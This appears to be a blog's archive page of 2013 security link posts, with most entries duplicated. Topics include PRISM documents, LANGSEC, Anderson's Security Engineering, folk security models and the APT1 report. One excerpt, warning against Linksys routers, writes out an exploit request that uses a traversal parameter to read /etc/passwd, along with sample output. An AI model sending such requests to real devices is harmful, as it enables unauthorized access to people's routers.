Archive for the 'Security' Category

[wikileaks ]PRISM – DHS PRISM 2004 – Requirements for Installation (original doc)

Saturday, June 8th, 2013

original PRISM docs from wikileaks

Language-theoretic Security

Sunday, April 14th, 2013

The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to tru…

Language-theoretic Security

Sunday, April 14th, 2013

The Language-theoretic approach (LANGSEC) regards the Internet insecurity epidemic as a consequence of ad hoc programming of input handling at all layers of network stacks, and in other kinds of software stacks. LANGSEC posits that the only path to tru…

Security Engineering – A Guide to Building Dependable Distributed Systems

Sunday, April 14th, 2013

Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier

Security Engineering – A Guide to Building Dependable Distributed Systems

Sunday, April 14th, 2013

Security Engineering , by Ross Andreson. ‘It’s beautiful. This is the best book on the topic there is’ Bruce Schneier

Don’t Use Linksys Routers « Superevr

Sunday, April 14th, 2013

the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nolog…

Don’t Use Linksys Routers « Superevr

Sunday, April 14th, 2013

the firmware is so buggy/insecure, so getting passwd file is as easy as: POST /apply.cgi Host: 192.168.1.1 submit_button=Wireless_Basic&change_action=gozila_cgi≠xt_page=/etc/passwd ====> root:x:0:0::/:/bin/sh nobody:x:99:99:Nobody:/:/bin/nolog…

Folk Models of Home Computer Security [.pdf]

Wednesday, March 20th, 2013

paper that describes folk mental models on computer security: about "viruses" and "hackers". interesting read

Folk Models of Home Computer Security [.pdf]

Wednesday, March 20th, 2013

paper that describes folk mental models on computer security: about "viruses" and "hackers". interesting read

APT1 Exposing One of China’s Cyber Espionage Units [PDF]

Wednesday, February 20th, 2013

report from a computer security company that links Chinese hack group APT1 to China’s government [Army] ————— aPt1 is believed to be the 2nd Bureau of the People’s Liberation army (PLa) General staff Department’s (GsD) 3rd Department (总…